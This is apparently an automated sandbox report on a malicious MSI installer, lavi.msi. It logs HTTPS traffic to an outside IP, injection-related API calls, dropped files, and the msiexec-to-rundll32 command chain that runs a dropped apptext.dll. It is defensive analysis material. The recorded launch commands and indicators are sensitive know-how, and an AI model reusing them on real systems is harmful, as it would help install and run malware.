            Source: unknownNetwork traffic detected: HTTP traffic on port 58109 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58102
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58101
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58104
            Source: unknownNetwork traffic detected: HTTP traffic on port 58093 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58103
            Source: unknownNetwork traffic detected: HTTP traffic on port 58087 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58100
            Source: unknownNetwork traffic detected: HTTP traffic on port 58102 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 58112 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 58097 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58109
            Source: unknownNetwork traffic detected: HTTP traffic on port 58108 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58106
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58105
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58108
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58107
            Source: unknownNetwork traffic detected: HTTP traffic on port 58101 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58112
            Source: unknownNetwork traffic detected: HTTP traffic on port 58092 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58114
            Source: unknownNetwork traffic detected: HTTP traffic on port 58105 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58111
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58110
            Source: unknownNetwork traffic detected: HTTP traffic on port 58086 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 58098 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 58107 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 58091 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58087
            Source: unknownNetwork traffic detected: HTTP traffic on port 58104 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 58095 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58086
            Source: unknownNetwork traffic detected: HTTP traffic on port 58100 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58089
            Source: unknownNetwork traffic detected: HTTP traffic on port 58089 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58088
            Source: unknownNetwork traffic detected: HTTP traffic on port 58114 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 58110 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 58106 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 58090 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 58094 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58098
            Source: unknownNetwork traffic detected: HTTP traffic on port 58088 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58097
            Source: unknownNetwork traffic detected: HTTP traffic on port 58103 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58094
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58093
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58096
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58095
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58090
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58092
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58091
            Source: unknownHTTPS traffic detected: 172.67.191.232:443 -> 192.168.2.8:58086 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.191.232:443 -> 192.168.2.8:58097 version: TLS 1.2
            Source: C:\Windows\System32\rundll32.exeCode function: 6_3_000001A99428D2C0 NtProtectVirtualMemory,6_3_000001A99428D2C0
            Source: C:\Windows\System32\rundll32.exeCode function: 6_3_000001A99428D250 NtAllocateVirtualMemory,6_3_000001A99428D250
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001A9942A8149 NtSetContextThread,6_2_000001A9942A8149
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001A9942C45F0 NtDuplicateObject,6_2_000001A9942C45F0
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001A994291600 NtClose,RtlExitUserThread,6_2_000001A994291600
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001A9942A7A50 NtSetContextThread,6_2_000001A9942A7A50
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001A9942C4740 NtFreeVirtualMemory,6_2_000001A9942C4740
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001A9942C3F40 NtAllocateVirtualMemory,6_2_000001A9942C3F40
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001A9942C4360 NtCreateThreadEx,6_2_000001A9942C4360
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001A9942917B0 NtClose,6_2_000001A9942917B0
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001A9942C4FF0 NtQueueApcThread,6_2_000001A9942C4FF0
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001A9942C4BE0 NtProtectVirtualMemory,6_2_000001A9942C4BE0
            Source: C:\Windows\explorer.exeCode function: 11_2_02BE82B4 NtFreeVirtualMemory,11_2_02BE82B4
            Source: C:\Windows\explorer.exeCode function: 11_2_02BEB388 NtAllocateVirtualMemory,11_2_02BEB388
            Source: C:\Windows\explorer.exeCode function: 11_2_02BEC704 NtDelayExecution,11_2_02BEC704
            Source: C:\Windows\explorer.exeCode function: 11_2_02BE80B8 RtlInitUnicodeString,NtCreateFile,11_2_02BE80B8
            Source: C:\Windows\explorer.exeCode function: 11_2_02BE8240 NtClose,11_2_02BE8240
            Source: C:\Windows\explorer.exeCode function: 11_2_02BF01A0 NtFreeVirtualMemory,11_2_02BF01A0
            Source: C:\Windows\explorer.exeCode function: 11_2_02BF01E0 NtQuerySystemInformation,NtDelayExecution,11_2_02BF01E0
            Source: C:\Windows\explorer.exeCode function: 11_2_02BF01D0 NtWriteFile,11_2_02BF01D0
            Source: C:\Windows\explorer.exeCode function: 11_2_02BE81C8 NtWriteFile,11_2_02BE81C8
            Source: C:\Windows\explorer.exeCode function: 11_2_02BF0130 NtAllocateVirtualMemory,11_2_02BF0130
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\5d243d.msiJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2527.tmpJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2586.tmpJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI25B6.tmpJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI25D6.tmpJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{BEA6F49C-A398-4148-AFB8-A4A1F2844AFA}Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2635.tmpJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2701.tmpJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSI2527.tmpJump to behavior
            Source: C:\Windows\Installer\MSI2701.tmpCode function: 4_2_004C6A504_2_004C6A50
            Source: C:\Windows\Installer\MSI2701.tmpCode function: 4_2_004FF0324_2_004FF032
            Source: C:\Windows\Installer\MSI2701.tmpCode function: 4_2_004EE2704_2_004EE270
            Source: C:\Windows\Installer\MSI2701.tmpCode function: 4_2_004EC2CA4_2_004EC2CA
            Source: C:\Windows\Installer\MSI2701.tmpCode function: 4_2_004F92A94_2_004F92A9
            Source: C:\Windows\Installer\MSI2701.tmpCode function: 4_2_004F84BD4_2_004F84BD
            Source: C:\Windows\Installer\MSI2701.tmpCode function: 4_2_004EA5874_2_004EA587
            Source: C:\Windows\Installer\MSI2701.tmpCode function: 4_2_004CC8704_2_004CC870
            Source: C:\Windows\Installer\MSI2701.tmpCode function: 4_2_004FD8D54_2_004FD8D5
            Source: C:\Windows\Installer\MSI2701.tmpCode function: 4_2_004EA9154_2_004EA915
            Source: C:\Windows\Installer\MSI2701.tmpCode function: 4_2_004E49204_2_004E4920
            Source: C:\Windows\Installer\MSI2701.tmpCode function: 4_2_004F0A484_2_004F0A48
            Source: C:\Windows\Installer\MSI2701.tmpCode function: 4_2_004C9CC04_2_004C9CC0
            Source: C:\Windows\Installer\MSI2701.tmpCode function: 4_2_004F5D6D4_2_004F5D6D
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018000EC306_2_000000018000EC30
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800F2C346_2_00000001800F2C34
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800E1D206_2_00000001800E1D20
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800E317C6_2_00000001800E317C
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800E358C6_2_00000001800E358C
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800E399C6_2_00000001800E399C
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800DB5E86_2_00000001800DB5E8
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800EE6046_2_00000001800EE604
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800E56386_2_00000001800E5638
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800E464C6_2_00000001800E464C
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018005A2706_2_000000018005A270
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800F32B46_2_00000001800F32B4
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800596E06_2_00000001800596E0
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800036F06_2_00000001800036F0
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800FB3186_2_00000001800FB318
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018000B7406_2_000000018000B740
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800F27A06_2_00000001800F27A0
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800F0F9C6_2_00000001800F0F9C
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001A9942C14906_2_000001A9942C1490
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001A9942AA1006_2_000001A9942AA100
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001A9942995006_2_000001A994299500
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001A9942AB4E06_2_000001A9942AB4E0
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001A9942A91206_2_000001A9942A9120
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001A9942B45506_2_000001A9942B4550
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001A994295D606_2_000001A994295D60
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001A9942A4DB06_2_000001A9942A4DB0
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001A9942A55C06_2_000001A9942A55C0
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001A9942999D06_2_000001A9942999D0
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001A9942BB5E06_2_000001A9942BB5E0
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001A9942B55E06_2_000001A9942B55E0
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001A9942C02106_2_000001A9942C0210
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001A9942B72206_2_000001A9942B7220
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001A9942966C06_2_000001A9942966C0
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001A9942B82A06_2_000001A9942B82A0
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001A9942A16A06_2_000001A9942A16A0
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001A9942A42A06_2_000001A9942A42A0
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001A9942ABED06_2_000001A9942ABED0
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001A9942B66E06_2_000001A9942B66E0
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001A99429A7306_2_000001A99429A730
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001A9942C1F406_2_000001A9942C1F40
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001A9942C2F606_2_000001A9942C2F60
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001A9942B2BB06_2_000001A9942B2BB0
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001A9942BFBC06_2_000001A9942BFBC0
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001A9942B13A36_2_000001A9942B13A3
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001A9942ACBE06_2_000001A9942ACBE0
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001A9942C28126_2_000001A9942C2812
            Source: C:\Windows\explorer.exeCode function: 11_2_02BE1A8C11_2_02BE1A8C
            Source: C:\Windows\explorer.exeCode function: 11_2_02BE1A7C11_2_02BE1A7C
            Source: C:\Windows\explorer.exeCode function: 11_2_02BE216411_2_02BE2164
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\apptext.dll F8E3EEF1FDA5969A7AABCC8FB5CC9F5FE245BBF6CC8E480459977B8E91EAB9BD
            Source: C:\Windows\Installer\MSI2701.tmpCode function: String function: 004E325F appears 103 times
            Source: C:\Windows\Installer\MSI2701.tmpCode function: String function: 004E3790 appears 39 times
            Source: C:\Windows\Installer\MSI2701.tmpCode function: String function: 004E3292 appears 70 times
            Source: lavi.msiBinary or memory string: OriginalFilenameviewer.exeF vs lavi.msi
            Source: lavi.msiBinary or memory string: OriginalFilenameAICustAct.dllF vs lavi.msi
            Source: apptext.dll.2.drBinary string: \BaseNamedObjects\NODCOMM%08XTo%08XCommPortAlpcNOD_SHEVT_%s%xSession\%u\NOD_SHMEM_%s%x\\\Device\\\.\MountPointManager\Device\LanmanRedirector\;%c:SystemRootMup\LanmanRedirector\NwRdr\NetWareRedirector\;LanmanRedirector\SystemHarddiskVolume%d%c:HarddiskDmVolumesS-%lu-0x%02hx%02hx%02hx%02hx%02hx%02hx%lu-%lu\NODSTSIBM037IBM437IBM500ASMO-708DOS-720ibm737ibm775ibm850ibm852IBM855ibm857IBM00858IBM860ibm861DOS-862IBM862IBM863IBM864IBM865cp866IBM866ibm869IBM870windows-874TIS-620cp875shift_jisshift-jisgb2312gb_2312-80gbkwindows-936ks_c_5601-1987EUC-KRbig5x-x-big5IBM1026IBM01047IBM01140IBM01141IBM01142IBM01143IBM01144IBM01145IBM01146IBM01147IBM01148IBM01149utf-16unicodeFFFEwindows-1250windows-1251windows-1252windows-1253windows-1254windows-1255windows-1256windows-1257windows-1258Johabmacintoshx-mac-japanesex-mac-chinesetradx-mac-koreanx-mac-arabicx-mac-hebrewx-mac-greekx-mac-cyrillicx-mac-chinesesimpx-mac-romanianx-mac-ukrainianx-mac-thaix-mac-cex-mac-icelandicx-mac-turkishx-mac-croatianutf-32utf-32BEx-Chinese_CNSx-cp20001x_Chinese-Etenx-cp20003x-cp20004x-cp20005x-IA5x-IA5-Germanx-IA5-Swedishx-IA5-Norwegianus-asciix-cp20261x-cp20269IBM273IBM277IBM278IBM280IBM284IBM285IBM290IBM297IBM420IBM423IBM424x-EBCDIC-KoreanExtendedIBM-Thaikoi8-rIBM871IBM880IBM905IBM00924EUC-JPx-cp20936x-cp20949cp1025koi8-uiso-8859-1iso-8859-2iso-8859-3iso-8859-4iso-8859-5iso-8859-6iso-8859-7iso-8859-8iso-8859-9iso-8859-13iso-8859-15x-Europaiso-8859-8-iiso-2022-jpcsISO2022JPiso-2022-krx-cp50227euc-jpEUC-CNeuc-krhz-gb-2312GB18030x-iscii-dex-iscii-bex-iscii-tax-iscii-tex-iscii-asx-iscii-orx-iscii-kax-iscii-max-iscii-gux-iscii-pautf-7utf-8%
            Source: classification engineClassification label: mal100.troj.evad.winMSI@9/24@3/2
            Source: C:\Windows\Installer\MSI2701.tmpCode function: 4_2_004C3860 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,OpenProcess,CloseHandle,Process32NextW,CloseHandle,4_2_004C3860
            Source: C:\Windows\Installer\MSI2701.tmpCode function: 4_2_004C4BA0 CoInitialize,CoCreateInstance,VariantInit,VariantClear,IUnknown_QueryService,IUnknown_QueryInterface_Proxy,IUnknown_QueryInterface_Proxy,CoAllowSetForegroundWindow,SysAllocString,SysAllocString,SysAllocString,SysAllocString,VariantInit,OpenProcess,WaitForSingleObject,GetExitCodeProcess,CloseHandle,LocalFree,VariantClear,VariantClear,VariantClear,VariantClear,VariantClear,SysFreeString,VariantClear,CoUninitialize,_com_issue_error,4_2_004C4BA0
            Source: C:\Windows\Installer\MSI2701.tmpCode function: 4_2_004C45B0 LoadResource,LockResource,SizeofResource,4_2_004C45B0
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CML266F.tmpJump to behavior
            Source: C:\Windows\System32\rundll32.exeMutant created: NULL
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\TEMP\~DFECD923E3C25B1323.TMPJump to behavior
            Source: C:\Windows\Installer\MSI2701.tmpKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\apptext.dll, Object
            Source: rundll32.exe, 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmp, apptext.dll.2.drBinary or memory string: UPDATE MsgPrefix SET JustCreatedFlag = 0 WHERE MsgPrefixID = ?;
            Source: rundll32.exe, 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmp, apptext.dll.2.drBinary or memory string: INSERT INTO CacheDbInfo(DbVersion, UsingAdditionalSemiUniqueID, LastMaintenanceTimestamp) VALUES(?, ?, ?);
            Source: rundll32.exe, 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmp, apptext.dll.2.drBinary or memory string: CREATE TABLE MsgCache(MsgRowid INTEGER PRIMARY KEY, MsgPrefixID INTEGER, MsgID BLOB NOT NULL, LastUsedTimestamp INTEGER, RecordFlags INTEGER, AVData BLOB, ASData BLOB);
            Source: rundll32.exe, 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmp, apptext.dll.2.drBinary or memory string: SELECT MsgRowid, AVData, ASData, LastUsedTimestamp, RecordFlags FROM MsgCache WHERE MsgID = ? AND MsgPrefixID = ?;
            Source: rundll32.exe, 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmp, apptext.dll.2.drBinary or memory string: SELECT MsgRowid, AVData, ASData, LastUsedTimestamp, RecordFlags, AdditionalSemiUniqueID FROM MsgCache WHERE MsgID = ? AND MsgPrefixID = ?;
            Source: rundll32.exe, 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmp, apptext.dll.2.drBinary or memory string: INSERT INTO TempDb.MsgPrefixRowsToDelete SELECT MsgPrefixID FROM MsgPrefix WHERE MsgPrefixID NOT IN (SELECT DISTINCT MsgPrefixID FROM MsgCache) AND (JustCreatedFlag = 0 OR JustCreatedFlag < ? OR JustCreatedFlag > ?);
            Source: rundll32.exe, 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmp, apptext.dll.2.drBinary or memory string: CREATE TABLE MsgPrefix(MsgPrefixID INTEGER PRIMARY KEY, MsgPrefixData BLOB NOT NULL, JustCreatedFlag INTEGER);
            Source: rundll32.exe, 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmp, apptext.dll.2.drBinary or memory string: CREATE TABLE TempDb.MsgPrefixRowsToDelete(MsgPrefixID INTEGER PRIMARY KEY);
            Source: rundll32.exe, 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmp, apptext.dll.2.drBinary or memory string: CREATE TABLE MsgCache(MsgRowid INTEGER PRIMARY KEY, MsgPrefixID INTEGER, MsgID BLOB, LastUsedTimestamp INTEGER, RecordFlags INTEGER, AVData BLOB, ASData BLOB, AdditionalSemiUniqueID BLOB NOT NULL);
            Source: rundll32.exe, 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmp, apptext.dll.2.drBinary or memory string: CREATE TABLE CacheDbInfo(DbVersion INTEGER, UsingAdditionalSemiUniqueID INTEGER, LastMaintenanceTimestamp INTEGER);
            Source: rundll32.exe, 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmp, apptext.dll.2.drBinary or memory string: SELECT DbVersion, UsingAdditionalSemiUniqueID, LastMaintenanceTimestamp FROM CacheDbInfo LIMIT 1;
            Source: rundll32.exe, 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmp, apptext.dll.2.drBinary or memory string: INSERT INTO TempDb.MsgCacheRowsToDelete SELECT MsgRowid FROM MsgCache WHERE LastUsedTimestamp < ? OR LastUsedTimestamp > ? OR MsgPrefixID NOT IN (SELECT MsgPrefixID FROM MsgPrefix);
            Source: rundll32.exe, 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmp, apptext.dll.2.drBinary or memory string: SELECT MsgPrefixID FROM MsgPrefix WHERE MsgPrefixData = ? LIMIT 1;
            Source: rundll32.exe, 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmp, apptext.dll.2.drBinary or memory string: SELECT MsgRowid, AVData, ASData, LastUsedTimestamp, RecordFlags, AdditionalSemiUniqueID FROM MsgCache WHERE MsgRowid = ?;
            Source: rundll32.exe, 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmp, apptext.dll.2.drBinary or memory string: CREATE TABLE TempDb.MsgCacheRowsToDelete(MsgRowid INTEGER PRIMARY KEY);
            Source: rundll32.exe, 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmp, apptext.dll.2.drBinary or memory string: INSERT INTO MsgPrefix(MsgPrefixData, JustCreatedFlag) VALUES (?, ?);
            Source: unknownProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\lavi.msi"
            Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 43BC20CBC49545F265F1331995ABDA6D
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI2701.tmp "C:\Windows\Installer\MSI2701.tmp" /DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\user\AppData\Roaming\apptext.dll, Object
            Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\apptext.dll, Object
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\apptext.dll, Object
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 43BC20CBC49545F265F1331995ABDA6DJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI2701.tmp "C:\Windows\Installer\MSI2701.tmp" /DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\user\AppData\Roaming\apptext.dll, ObjectJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\apptext.dll, ObjectJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: srpapi.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: srclient.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: spp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: vssapi.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: vsstrace.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
